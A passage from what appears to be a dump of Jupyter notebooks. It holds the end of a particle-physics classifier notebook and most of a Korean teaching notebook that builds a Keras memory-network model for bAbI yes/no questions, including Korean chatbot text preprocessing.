8 with loss = 3.2645716380682534e-05\n" ] ], [ [ "## Response on validation data with TTA", "_____no_output_____" ] ], [ [ "valData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'val.hdf5', \"r+\"), inputPipe=inputPipe,\n rotate = True, reflect = True, augRotMult=8)", "_____no_output_____" ], [ "batchEnsemblePredict(ensemble, weights, valData, ensembleSize=ensembleSize, verbose=1)", "Predicting batch 1 out of 10\nPrediction took 0.01391659113280475s per sample\n\nPredicting batch 2 out of 10\nPrediction took 0.012305215643905102s per sample\n\nPredicting batch 3 out of 10\nPrediction took 0.0121675153426826s per sample\n\nPredicting batch 4 out of 10\nPrediction took 0.012166589914634823s per sample\n\nPredicting batch 5 out of 10\nPrediction took 0.012019737253896892s per sample\n\nPredicting batch 6 out of 10\nPrediction took 0.011995233291387557s per sample\n\nPredicting batch 7 out of 10\nPrediction took 0.012182317556254567s per sample\n\nPredicting batch 8 out of 10\nPrediction took 0.011865544037148356s per sample\n\nPredicting batch 9 out of 10\nPrediction took 0.012033153799176216s per sample\n\nPredicting batch 10 out of 10\nPrediction took 0.012129837618768215s per sample\n\n" ], [ "print('Testing ROC AUC: unweighted {}, weighted {}'.format(roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source)),\n roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source), sample_weight=getFeature('weights', valData.source))))", "Testing ROC AUC: unweighted 0.9032920169789936, weighted 0.9360693746679931\n" ], [ "amsScanSlow(convertToDF(valData.source))", "50000 candidates loaded\n" ], [ "%%time\nbootstrapMeanAMS(convertToDF(valData.source), N=512)", "50000 candidates loaded\n\nMean AMS=4.0+-0.2, at mean cut of 0.961+-0.008\nExact mean cut 0.9606163307325915, corresponds to AMS of 3.9670679002860356\nCPU times: user 2.58 s, sys: 15.1 s, total: 17.6 s\nWall time: 2min 9s\n" ] ], [ [ "In the validation metrics we also find improvement over 5_Model_Data_Augmentation: overallAMS moves from 3.97 to 3.99, and AMS corresponding to mean cut increases to 3.97 from 3.91.", "_____no_output_____" ], [ "# Test scoring", "_____no_output_____" ] ], [ [ "testData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'testing.hdf5', \"r+\"), inputPipe=inputPipe,\n rotate = True, reflect = True, augRotMult=8)", "_____no_output_____" ], [ "%%time\nbatchEnsemblePredict(ensemble, weights, testData, ensembleSize=ensembleSize, verbose=1)", "Predicting batch 1 out of 10\nPrediction took 0.011936514278721402s per sample\n\nPredicting batch 2 out of 10\nPrediction took 0.01206147660294717s per sample\n\nPredicting batch 3 out of 10\nPrediction took 0.012110572331551123s per sample\n\nPredicting batch 4 out of 10\nPrediction took 0.012047166942347858s per sample\n\nPredicting batch 5 out of 10\nPrediction took 0.01204522031410174s per sample\n\nPredicting batch 6 out of 10\nPrediction took 0.012004600540413099s per sample\n\nPredicting batch 7 out of 10\nPrediction took 0.01202152247525413s per sample\n\nPredicting batch 8 out of 10\nPrediction took 0.012035000745901329s per sample\n\nPredicting batch 9 out of 10\nPrediction took 0.01231693161666732s per sample\n\nPredicting batch 10 out of 10\nPrediction took 0.012164079189165072s per sample\n\nCPU times: user 2h, sys: 10min 39s, total: 2h 10min 39s\nWall time: 1h 50min 40s\n" ], [ "scoreTestOD(testData.source, 0.9606163307325915)", "Public:Private AMS: 3.6798281799107344 : 3.7847099714589465\n" ] ], [ [ "Unfortunately, applying the cut to the test data shows an improvement in the public score (3.65->3.68) but a large decrease in private score (3.82->3.79)", "_____no_output_____" ], [ "# Save/Load", "_____no_output_____" ] ], [ [ "name = \"weights/Swish_SWA-125\"", "_____no_output_____" ], [ "saveEnsemble(name, ensemble, weights, compileArgs, overwrite=1)", "_____no_output_____" ], [ "ensemble, weights, compileArgs, _, _ = loadEnsemble(name)", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ] ]
cb1c12c25c4587472b5f92d6b4ac14715faf730e
230,226
ipynb
Jupyter Notebook
TF-Keras_CHATBOT/0.Keras-Babi_MathQA.ipynb
ds3mbc-snu/ds3mbc-snu.github.io
62de974ae1e60a90ffed7531e609c959845b734e
[ "MIT" ]
null
null
null
TF-Keras_CHATBOT/0.Keras-Babi_MathQA.ipynb
ds3mbc-snu/ds3mbc-snu.github.io
62de974ae1e60a90ffed7531e609c959845b734e
[ "MIT" ]
null
null
null
TF-Keras_CHATBOT/0.Keras-Babi_MathQA.ipynb
ds3mbc-snu/ds3mbc-snu.github.io
62de974ae1e60a90ffed7531e609c959845b734e
[ "MIT" ]
null
null
null
55.637023
41,428
0.699474
[ [ [ "# 탐구실험용 toy 코드 (Facebook 바비 Question-Answer)\n\n<p> &nbsp;\n \n# +++++++++++++++++++++++++++++++++++++++++++++\n\n", "_____no_output_____" ], [ "# toy 코드의 한계 및 약점은 ? 약점을 보강할 수 있는 방법 ?\n\n<p>\n\n# 영어와 한글 데이터의 부족을 한영 번역기로 try 하며 탐구\n \n<p> &nbsp;\n \n## +++++++++++++++++++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n \n## toy 코드를 통해 약점을 알아내고, 데이터를 조작하며 (좋은 뜻으로 조절),\n\n## 데이터가 어떻게 변형되고, 행렬의 weight와 정확도가 어떻게 변화하는지?\n\n## input 과 중간의 형태, 그리고 최종 output 의 흐름을 스토리텔링하며 탐구 !", "_____no_output_____" ], [ "# =========== 탐구과제용 :기본적인 문제 =========\n\n# 어떻게 AI 와 수학교육이 융합하여 발전할 수 있을까?\n\n# 영어 데이터를 한글 학습데이터를 번역하고 보강한다.\n\n# 한국어 질문-응답 수학학습 시스템을 만들 수 있을까?\n\n# 무엇보다도, 데이터를 처리하는 방법을 먼저 익히고\n\n# 데이터로 딥러닝하는 알고리즘과 attention 을 탐구하자.\n\n# ==========================================", "_____no_output_____" ], [ "# Babi 문제 (인터넷에서 babi 문제와 데이터를 찾아본다)\n\n# 교재 130 페이지 참고", "_____no_output_____" ] ], [ [ "# babi 데이터 \n\n Sandra travelled to the kitchen. \n Sandra travelled to the hallway. \n Mary went to the bathroom. \n Sandra moved to the garden. \n\n Where is Sandra ?\n Ground Truth: Garden (based on single supporting fact 4)\n\n### Each sentence is provided with an ID. The IDs for a given “story” start at 1 and increase. \n### When the IDs in a file reset back to 1 you can consider the following sentences as a new “story”. \n### Supporting fact ID refer to the sentences within a “story”.\n\n 1 Mary moved to the bathroom.\n 2 John went to the hallway.\n 3 Where is Mary? bathroom 1\n 4 Daniel went back to the hallway.\n 5 Sandra moved to the garden.\n 6 Where is Daniel? hallway 4\n 7 John moved to the office.\n 8 Sandra journeyed to the bathroom.\n 9 Where is Daniel? hallway 4\n 10 Mary moved to the hallway.\n 11 Daniel travelled to the office.\n 12 Where is Daniel? office 11\n 13 John went back to the garden.\n 14 John moved to the bedroom.\n 15 Where is Sandra? bathroom 8\n 1 Sandra travelled to the office.\n 2 Sandra went to the bathroom.\n 3 Where is Sandra? bathroom 2\n \n \n", "_____no_output_____" ] ], [ [ "## 바비 데이터 github : https://github.com/andri27-ts/bAbI\n\n<p>\n\n\n# 수학교육 탐구과제로 도전가능한 문제 \n \n# QA6 - Yes/No Questions\t\n\n# QA7 - Counting\t\n", "_____no_output_____" ], [ "### 바비 데이터 : https://github.com/harvardnlp/MemN2N/tree/master/babi_data/en\n\n\n<p> &nbsp;\n \n \n# settings ==> .keras ==> dataset 안에 데이터 저장됨 \n\n\nhttps://appliedmachinelearning.blog/2019/05/01/developing-factoid-question-answering-system-on-babi-facebook-data-set-python-keras-part-1/\n\n\n", "_____no_output_____" ], [ "# Feature Extraction\n\nLet us first write a helper function to vectorize each stories in order to fetch it to memory network model which we will be creating later.", "_____no_output_____" ], [ "https://appliedmachinelearning.blog/2019/05/02/building-end-to-end-memory-network-for-question-answering-system-on-babi-facebook-data-set-python-keras-part-2/", "_____no_output_____" ], [ "# ===================================\n\n\n# 바비 데이터로 뉴럴네트워크 모델 학습시키기 \n\n\n<p> &nbsp;", "_____no_output_____" ], [ "\n# === 자연어처리 : babi QAchatbot 만들기 ===\n", "_____no_output_____" ], [ "<p> &nbsp;\n\n# 본래의 Babi QA6 데이터는 data_in 에있다\n\n## ./data_in/babi_qa6_train.txt\n\n## ./data_in/babi_qa6_test.txt\n\n\n<p> &nbsp;\n \n# =================================\n \n<p> &nbsp;\n\n# toy code 에서는 다음 데이터를 사용한다.\n\n## ./data_in/babi_train_qa.txt\n\n## ./data_in/babi_test_qa.txt\n \n## toy code 의 데이터와 본래 데이터의 차이점은 ??\n \n## +++++++++++++++++++++++++++++++++", "_____no_output_____" ], [ "<p> &nbsp;\n\n# ========= Toy 바비 QA 탐구===========", "_____no_output_____" ], [ "\n", "_____no_output_____" ] ], [ [ "#Library Imports\n\nimport pickle\n\nimport numpy as np\nimport pandas as pd", "_____no_output_____" ] ], [ [ "# pickle 데이터 파일과 csv 데이터 파일\n\n## 교재 80페이지의 pandas, numpy 를 익힌다. ", "_____no_output_____" ] ], [ [ "#retrieve training data\n\n# IOPub data rate exceeded. \n# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000\n\nunpickled_df = pd.read_pickle('./data_in/babi_train_qa.txt')\n# print( unpickled_df)== list 이다 \n \ndf = pd.DataFrame( unpickled_df ) \n# df = pd.DataFrame(some_list, columns=[\"colummn\"]) \n\ndf.to_csv('./data_in/babi_train_qa.csv', index=False)\n\nprint( df[0:5] ) \n\ndf.shape # 학습 데이터의 갯수 일만개 :", " 0 \\\n0 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n1 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n2 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n3 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n4 [Mary, moved, to, the, bathroom, ., Sandra, jo... \n\n 1 2 \n0 [Is, Sandra, in, the, hallway, ?] no \n1 [Is, Daniel, in, the, bathroom, ?] no \n2 [Is, Daniel, in, the, office, ?] no \n3 [Is, Daniel, in, the, bedroom, ?] yes \n4 [Is, Daniel, in, the, bedroom, ?] yes \n" ], [ "#retrieve training data\n\n# IOPub data rate exceeded.\n# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000\n\nunpickled_df = pd.read_pickle('./data_in/babi_test_qa.txt')\n# print( unpickled_df)== list 이다 \n \ndf = pd.DataFrame( unpickled_df ) \n# df = pd.DataFrame(some_list, columns=[\"colummn\"]) \n\ndf.to_csv('./data_in/babi_test_qa.csv', index=False)\n\nprint( df[0][0] )\nprint( df[1][0] )\nprint( df[2][0] )\n\nprint( df[0][4] )\nprint( df[1][4] )\nprint( df[2][4] )\n\nprint( df[0][5] )\nprint( df[1][5] )\nprint( df[2][5] )\n\nprint( df.shape ) # ===> 테스트 데이터의 갯수 1000 개", "['Mary', 'got', 'the', 'milk', 'there', '.', 'John', 'moved', 'to', 'the', 'bedroom', '.']\n['Is', 'John', 'in', 'the', 'kitchen', '?']\nno\n['Mary', 'got', 'the', 'milk', 'there', '.', 'John', 'moved', 'to', 'the', 'bedroom', '.', 'Mary', 'discarded', 'the', 'milk', '.', 'John', 'went', 'to', 'the', 'garden', '.', 'Daniel', 'moved', 'to', 'the', 'bedroom', '.', 'Daniel', 'went', 'to', 'the', 'garden', '.', 'Daniel', 'travelled', 'to', 'the', 'bathroom', '.', 'Sandra', 'travelled', 'to', 'the', 'bedroom', '.', 'Mary', 'took', 'the', 'football', 'there', '.', 'Sandra', 'grabbed', 'the', 'milk', 'there', '.']\n['Is', 'Daniel', 'in', 'the', 'bedroom', '?']\nno\n['Daniel', 'went', 'back', 'to', 'the', 'kitchen', '.', 'Mary', 'grabbed', 'the', 'apple', 'there', '.']\n['Is', 'Daniel', 'in', 'the', 'office', '?']\nno\n(1000, 3)\n" ] ], [ [ "\n# [문제] 아래 QA6 text 파일과 비교하여보라\n\n## ./data_in/babi_qa6_train.txt\n\n## ./data_in/babi_qa6_test.txt", "_____no_output_____" ] ], [ [ "with open('./data_in/babi_train_qa.txt', 'rb') as f:\n train_data = pickle.load(f)\n\nprint( train_data[10] )\ntrain_data[0][0:3]", "(['Sandra', 'went', 'back', 'to', 'the', 'hallway', '.', 'Sandra', 'moved', 'to', 'the', 'office', '.'], ['Is', 'Sandra', 'in', 'the', 'office', '?'], 'yes')\n" ], [ "#retrieve test data\n\nwith open('./data_in/babi_test_qa.txt', 'rb') as f:\n test_data = pickle.load(f)", "_____no_output_____" ], [ "#Number of training instances\nlen(train_data)", "_____no_output_____" ], [ "#Number of test instances\n\nlen(test_data)", "_____no_output_____" ], [ "#Example of one of the instances\n\ntrain_data[10]", "_____no_output_____" ], [ "' '.join(train_data[10][0])", "_____no_output_____" ], [ "' '.join(train_data[10][1])", "_____no_output_____" ], [ "train_data[10][2]", "_____no_output_____" ] ], [ [ "# ++++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n \n# [과제] 한글 챗복 데이터 다루기 \n \n \n<p> &nbsp;\n \n# ++++++++++++++++++++++++++++++++++++\n\n<p>\n\n# [과제 1] data_nmt/conversaiton2.txt 데이터 다루기", "_____no_output_____" ] ], [ [ "import pandas as pd\n\nfile = open( \"./data_nmt/conversation2.txt\", \"r\" , encoding=\"utf-8\")\ndata = file.readlines()\ndf1 = []\nfor ii in data:\n df1.append(ii[:-1])\n\n\ndf2 = pd.DataFrame( df1 )\n \ndf2.to_csv( './data_nmt/conversation2.csv' , index=False, encoding='utf-8')\n\n\ndatacsv = pd.read_csv( './data_nmt/conversation2.csv' , encoding='utf-8')\n\ndatacsv", "_____no_output_____" ], [ "print( datacsv[0:5] )\n\nresult_data=list( )\n\ninput_data = list( datacsv['0'][0:5] )\n######################################\n\nfor seq in input_data :\n print( seq )\n result = \" \".join( okt.morphs(seq.replace(' ', '')))\n result_data.append( result )\n \nprint( result_data )\n\ndatas = []\n\ndatas.extend( result_data )\n \ndatas", " 0\n0 어떻게 지내세요?\n1 잘 지내고 있어요. 당신은요?\n2 저도 잘 지내고 있어요.\n3 네, 그럼 안녕히 가세요.\n4 계속 연락해요.\n어떻게 지내세요?\n잘 지내고 있어요. 당신은요?\n저도 잘 지내고 있어요.\n네, 그럼 안녕히 가세요.\n계속 연락해요.\n['어떻게 지내세요 ?', '잘 지내고있어요 . 당 신 은 요 ?', '저 도 잘 지내고있어요 .', '네 , 그럼 안녕히가세요 .', '계속 연락 해 요 .']\n" ], [ "\nimport re\n\nFILTERS = \"([~.,!?\\\"':;)(])\"\nCHANGE_FILTER = re.compile(FILTERS)\n\nvocabwords = []\nfor sentence in datas:\n # FILTERS = \"([~.,!?\\\"':;)(])\"\n # 위 필터와 같은 값들을 정규화 표현식을 \n # 통해서 모두 \"\" 으로 변환 해주는 부분이다.\n sentence = re.sub(CHANGE_FILTER, \"\", sentence)\n for word in sentence.split():\n vocabwords.append(word)\n \nprint( vocabwords )", "['어떻게', '지내세요', '잘', '지내고있어요', '당', '신', '은', '요', '저', '도', '잘', '지내고있어요', '네', '그럼', '안녕히가세요', '계속', '연락', '해', '요']\n" ], [ "import re\n\n\nDATA_PATH=\"./data_nmt/conversation2.txt\" \n############## 챗봇 데이터 ############\n\n\n\n\ndef Tokenizer( sentence ):\n token=[]\n for word in sentence.strip().split():\n token.extend(re.compile(\"([.,!?\\\"':;)(])\").split(word))\n \n ret=[t for t in token if t]\n return ret \n\n \n \nwordsk=[]\ndatask=[]\n\n\n\nwith open( DATA_PATH , 'r' , encoding='utf-8' ) as f:\n lines=f.read()\n datask.append(lines)\n wordsk=Tokenizer( lines )\n wordsk=list( set( wordsk ) )\n\n \n# list <=== datas.shape \n\n\nprint( wordsk[0:10] )\n\ndatask[0][0:100] ", "['스트레스', '캐나다의', '다음에', '볼링이나', '미용실은', '지갑', '4분전에요', '바쿠', '언제', '이메일로']\n" ], [ "from konlpy.tag import Okt\n\nokt = Okt()\n\n\nwordsz=[]\ndatasz=[]\n\nwith open( DATA_PATH , 'r', encoding='utf-8') as content_file :\n for con in content_file: \n content = content_file.read()\n datasz.append( content )\n wordsz.extend( okt.morphs(content) )\n wordsz = list(set(wordsz))\n\n \nprint( wordsz[0:10] )\n\ndatasz[0][0:100] ", "['칠까', '스트레스', '전부터', '의', '지갑', '바쿠', '언제', '레스', '야', '모르는']\n" ] ], [ [ "# ++++++++++++++++++++++++++++++++++++\n\n<p>\n\n# [과제 2] data_in/ChatBotData.csv 데이터 다루기", "_____no_output_____" ] ], [ [ "import pandas as pd\n\n\n\ndata = pd.read_csv( './data_in/ChatBotData.csv' , encoding='utf-8')\n\nprint( data.head() ) \n\nquestions, answers = list( data['Q'] ) , list( data['A'] )\n\n\nfrom konlpy.tag import Okt # Twitter\nfrom tqdm import tqdm\n \nmorph_analyzer = Okt() # Twitter()\n# 형태소 토크나이즈 결과 문장을 받을\n# 리스트를 생성합니다.\n\nresult_data = list()\n# 데이터에 있는 매 문장에 대해 토크나이즈를\n# 할 수 있도록 반복문을 선언합니다.\n\n\n# Twitter.morphs 함수를 통해 토크나이즈 된\n# 리스트 객체를 받고 다시 공백문자를 기준으로\n# 하여 문자열로 재구성 해줍니다.\nfor seq in tqdm( questions + answers ):\n morphlized_seq = \" \".join(morph_analyzer.morphs(seq.replace(' ', '')))\n result_data.append(morphlized_seq)\n \n \nquestions = result_data \n ", " 0%| | 32/23646 [00:00<01:18, 302.70it/s]" ], [ "\nimport re\n\nFILTERS = \"([~.,!?\\\"':;)(])\"\nCHANGE_FILTER = re.compile(FILTERS)\n\n\nvocabwords = []\nfor sentence in datas:\n # FILTERS = \"([~.,!?\\\"':;)(])\"\n # 위 필터와 같은 값들을 정규화 표현식을 \n # 통해서 모두 \"\" 으로 변환 해주는 부분이다.\n sentence = re.sub(CHANGE_FILTER, \"\", sentence)\n for word in sentence.split():\n vocabwords.append(word)\n \n\nprint( len(vocabwords) )\n \nvocab = set( vocabwords )\n\nprint( len(vocab) )\n\nvocfile = './data_out/vocabularyData.txt'\n\nwith open(vocfile , 'w' , encoding='utf-8') as wf:\n for w in vocab:\n wf.write(w+\"\\n\")\n print(\"단어장이 새로 만들어짐 !!\")\n", "111808\n15680\n단어장이 새로 만들어짐 !!\n" ] ], [ [ "# ++++++++++++++++++++++++++++++++++++\n\n<p>\n \n\n# [문제] 한글 단어장을 만드는 과정을 이해하자 !!", "_____no_output_____" ], [ "# ++++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n \n# 챗봇 데이터의 단어장으로 문장을 벡터로 표현 !!\n \n \n<p> &nbsp;\n \n# ++++++++++++++++++++++++++++++++++++\n\n", "_____no_output_____" ], [ "## 교재 30페이지의 내용과 비교한다\n\n", "_____no_output_____" ] ], [ [ "set1=[1,2,3,4,5, 1,2,3,9]\nset2=[2,3,5,6,7, 2,3,4,8]\n\nset1 = set(set1) \n\nmoim = set()\n\nmoim = moim.union( set1)\nmoim = moim.intersection( set(set2))\nprint( moim )\n", "{2, 3, 4, 5}\n" ] ], [ [ "# ./data_in/babi_train_qa.txt 데이터", "_____no_output_____" ] ], [ [ "import pickle\n\n\nwith open('./data_in/babi_train_qa.txt', 'rb') as f:\n train_data = pickle.load(f)\n\nprint( train_data[10] )\ntrain_data[0][0:3]\n\n\n#First we will build a set of all the words in the dataset:\nvocab = set()\nfor story, question, answer in train_data:\n vocab = vocab.union(set(story)) #Set returns unique words in the sentence\n #Union returns the unique common elements from a two sets\n vocab = vocab.union(set(question))", "(['Sandra', 'went', 'back', 'to', 'the', 'hallway', '.', 'Sandra', 'moved', 'to', 'the', 'office', '.'], ['Is', 'Sandra', 'in', 'the', 'office', '?'], 'yes')\n" ], [ "vocab.add('no')\nvocab.add('yes')", "_____no_output_____" ], [ "for x in vocab :\n if( x.startswith('b')) :\n print( x )", "back\nbathroom\nbedroom\n" ], [ "#Calculate len and add 1 for Keras placeholder - Placeholders are used to feed in the data to the network. \n#They need a data type, and have optional shape arguements.\n#They will be empty at first, and then the data will get fed into the placeholder\n\nvocab_len = len(vocab) + 1", "_____no_output_____" ], [ "vocab_len", "_____no_output_____" ], [ "#retrieve test data\n\nwith open('./data_in/babi_test_qa.txt', 'rb') as f:\n test_data = pickle.load(f)\n \n#Now we are going to calculate the longest story and the longest question\n#We need this for the Keras pad sequences. \n\n#Keras training layers expect all of the input to have the same length, so \n#we need to pad \n\nall_data = test_data + train_data", "_____no_output_____" ], [ "all_story_lens = [len(data[0]) for data in all_data]", "_____no_output_____" ], [ "max_story_len = (max(all_story_lens))", "_____no_output_____" ], [ "max_question_len = max([len(data[1]) for data in all_data])", "_____no_output_____" ] ], [ [ "# 이제 Babi 데이터의 문장을 벡터로 만들자", "_____no_output_____" ], [ "First, we will go through a manual process of how to vectorize the data, and then we will create a function that does this automatically for us. ", "_____no_output_____" ] ], [ [ "import keras\n\nprint( keras.__version__ )\n\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom keras.preprocessing.text import Tokenizer\n", "Using TensorFlow backend.\n" ], [ "#Create an instance of the tokenizer object:\n\ntokenizer = Tokenizer(filters = [])\n\ntokenizer.fit_on_texts(vocab)", "_____no_output_____" ], [ "#Dictionary that maps every word in our vocab to an index\n# It has been automatically lowercased\n#This tokenizer can give different indexes for different words depending on when we run it\n\n\ntokenizer.word_index", "_____no_output_____" ], [ "#Tokenize the stories, questions and answers:\ntrain_story_text = []\ntrain_question_text = []\ntrain_answers = []", "_____no_output_____" ], [ "#Separating each of the elements\n\nfor story,question,answer in train_data:\n train_story_text.append(story)\n train_question_text.append(question) \n train_answers.append(answer)\n ", "_____no_output_____" ], [ "#Coverting the text into the indexes \n\ntrain_story_seq = tokenizer.texts_to_sequences(train_story_text)", "_____no_output_____" ], [ "#Create a function for vectorizing the stories, questions and answers:\n\ndef vectorize_stories(data,word_index = tokenizer.word_index, max_story_len = max_story_len, max_question_len = max_question_len):\n #vectorized stories:\n X = []\n #vectorized questions:\n Xq = []\n #vectorized answers:\n Y = []\n \n for story, question, answer in data:\n #Getting indexes for each word in the story\n x = [word_index[word.lower()] for word in story]\n #Getting indexes for each word in the story\n xq = [word_index[word.lower()] for word in question]\n #For the answers\n y = np.zeros(len(word_index) + 1) #Index 0 Reserved when padding the sequences\n y[word_index[answer]] = 1\n \n X.append(x)\n Xq.append(xq)\n Y.append(y)\n \n #Now we have to pad these sequences:\n return(pad_sequences(X,maxlen=max_story_len), pad_sequences(Xq, maxlen=max_question_len), np.array(Y))\n ", "_____no_output_____" ], [ "inputs_train, questions_train, answers_train = vectorize_stories(train_data)", "_____no_output_____" ], [ "inputs_test, questions_test, answers_test = vectorize_stories(test_data)", "_____no_output_____" ], [ "inputs_train[3]", "_____no_output_____" ], [ "# train_story_text[3]\n\ntrain_story_text[0]", "_____no_output_____" ], [ "# train_story_seq[3]\n\ntrain_story_seq[0]", "_____no_output_____" ], [ "train_answers[3]", "_____no_output_____" ], [ "answers_train[3]", "_____no_output_____" ] ], [ [ "# 교재 36페이지의 input-output mapping 참고\n\n\n# 벡터 대응시키는 모델 (뉴럴네트워크)", "_____no_output_____" ] ], [ [ "#Imports\n\nfrom keras.models import Sequential, Model\n\nfrom keras.layers.embeddings import Embedding\n\nfrom keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate, LSTM", "_____no_output_____" ], [ "# We need to create the placeholders \n#The Input function is used to create a keras tensor\n#PLACEHOLDER shape = (max_story_len,batch_size)\n#These are our placeholder for the inputs, ready to recieve batches of the stories and the questions\n\ninput_sequence = Input((max_story_len,)) #As we dont know batch size yet\n\nquestion = Input((max_question_len,))", "_____no_output_____" ], [ "print( input_sequence )\n\nprint( question )", "Tensor(\"input_1:0\", shape=(None, 156), dtype=float32)\nTensor(\"input_2:0\", shape=(None, 6), dtype=float32)\n" ] ], [ [ "# encocder + decoder \n\n## 교재 129 페이지 참고\n\n![title](images/babiMNN.png)", "_____no_output_____" ], [ "On the left part of the previous image we can see a representation of a single layer of this model. Two different embeddings are calculated for each sentence, A and C. Also, the query or question q is embedded, using the B embedding.\n\nThe A embeddings mi, are then computed using an inner product with the question embedding u (this is the part where the attention is taking place, as by computing the inner product between these embeddings what we are doing is looking for matches of words from the query and the sentence, to then give more importance to these matches using a Softmax function on the resulting terms of the dot product).\n\nLastly, we compute the output vector o using the embeddings from C (ci), and the weights or probabilities pi obtained from the dot product. With this output vector o, the weight matrix W, and the embedding of the question u, we can finally calculate the predicted answer a hat.\n\nTo build the entire network, we just repeat these procedure on the different layers, using the predicted output from one of them as the input for the next one. This is shown on the right part of the previous image.\n\n\n\n\n\n\nThey have to have the same dimension as the data that will be fed, and can also have a batch size defined, although we can leave it blank if we dont know it at the time of creating the placeholders.\n\nNow we have to create the embeddings mentioned in the paper, A, C and B. An embedding turns an integer number (in this case the index of a word) into a d dimensional vector, where context is taken into account. Word embeddings are widely used in NLP and is one of the techniques that has made the field progress so much in the recent years.", "_____no_output_____" ] ], [ [ "#Create input encoder A:\n\ninput_encoder_m = Sequential()\ninput_encoder_m.add(Embedding(input_dim=vocab_len,output_dim = 64)) #From paper\ninput_encoder_m.add(Dropout(0.3))\n\n#Outputs: (Samples, story_maxlen,embedding_dim) -- Gives a list of the lenght of the samples where each item has the\n#lenght of the max story lenght and every word is embedded in the embbeding dimension", "_____no_output_____" ], [ "#Create input encoder C:\n\ninput_encoder_c = Sequential()\ninput_encoder_c.add(Embedding(input_dim=vocab_len,output_dim = max_question_len)) #From paper\ninput_encoder_c.add(Dropout(0.3))\n\n#Outputs: (samples, story_maxlen, max_question_len)", "_____no_output_____" ], [ "#Create question encoder:\n#Create input encoder B:\n\nquestion_encoder = Sequential()\nquestion_encoder.add(Embedding(input_dim=vocab_len,output_dim = 64,input_length=max_question_len)) #From paper\nquestion_encoder.add(Dropout(0.3))\n\n#Outputs: (samples, question_maxlen, embedding_dim)", "_____no_output_____" ], [ "#Now lets encode the sequences, passing the placeholders into our encoders:\n\ninput_encoded_m = input_encoder_m(input_sequence)\ninput_encoded_c = input_encoder_c(input_sequence)\nquestion_encoded = question_encoder(question)", "_____no_output_____" ] ], [ [ "## ++++++++++++++++++++++++\n\nOnce we have created the two embeddings for the input sentences, and the embeddings for the questions, we can start defining the operations that take place in our model. As mentioned previously, we compute the attention by doing the dot product between the embedding of the questions and one of the embeddings of the stories, and then doing a softmax. The following block shows how this is done:", "_____no_output_____" ] ], [ [ "#Use dot product to compute similarity between input encoded m and question \n#Like in the paper:\n\nmatch = dot([input_encoded_m,question_encoded], axes = (2,2))\nmatch = Activation('softmax')(match)", "_____no_output_____" ] ], [ [ "After this, we need to calculate the output o adding the match matrix with the second input vector sequence, and then calculate the response using this output and the encoded question.", "_____no_output_____" ] ], [ [ "#For the response we want to add this match with the ouput of input_encoded_c\n\nresponse = add([match,input_encoded_c])\nresponse = Permute((2,1))(response) #Permute Layer: permutes dimensions of input", "_____no_output_____" ], [ "#Once we have the response we can concatenate it with the question encoded:\n\nanswer = concatenate([response, question_encoded])", "_____no_output_____" ], [ "answer", "_____no_output_____" ] ], [ [ "Lastly, once this is done we add the rest of the layers of the model, adding an LSTM layer (instead of an RNN like in the paper), a dropout layer and a final softmax to compute the output.", "_____no_output_____" ] ], [ [ "# Reduce the answer tensor with a RNN (LSTM)\n\nanswer = LSTM(32)(answer)", "_____no_output_____" ], [ "#Regularization with dropout:\n\nanswer = Dropout(0.5)(answer)\n\n#Output layer:\n\nanswer = Dense(vocab_len)(answer) #Output shape: (Samples, Vocab_size) #Yes or no and all 0s", "_____no_output_____" ], [ "#Now we need to output a probability distribution for the vocab, using softmax:\nanswer = Activation('softmax')(answer)", "_____no_output_____" ] ], [ [ "# 모델 Model !!\n\nNotice here that the output is a vector of the size of the vocabulary (that is, the length of the number of words known by the model), where all the positions should be zero except the ones at the indexes of ‘yes’ and ‘no’.", "_____no_output_____" ] ], [ [ "#Now we build the final model:\n\nmodel = Model([input_sequence,question], answer)\n", "_____no_output_____" ], [ "model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n#Categorical instead of binary cross entropy as because of the way we are training\n#we could actually see any of the words from the vocab as output\n#however, we should only see yes or no", "_____no_output_____" ], [ "model.summary()", "Model: \"model_1\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) (None, 156) 0 \n__________________________________________________________________________________________________\ninput_2 (InputLayer) (None, 6) 0 \n__________________________________________________________________________________________________\nsequential_1 (Sequential) multiple 2432 input_1[0][0] \n__________________________________________________________________________________________________\nsequential_4 (Sequential) (None, 6, 64) 2432 input_2[0][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 156, 6) 0 sequential_1[1][0] \n sequential_4[1][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 156, 6) 0 dot_1[0][0] \n__________________________________________________________________________________________________\nsequential_3 (Sequential) multiple 228 input_1[0][0] \n__________________________________________________________________________________________________\nadd_1 (Add) (None, 156, 6) 0 activation_1[0][0] \n sequential_3[1][0] \n__________________________________________________________________________________________________\npermute_1 (Permute) (None, 6, 156) 0 add_1[0][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 6, 220) 0 permute_1[0][0] \n sequential_4[1][0] \n__________________________________________________________________________________________________\nlstm_1 (LSTM) (None, 32) 32384 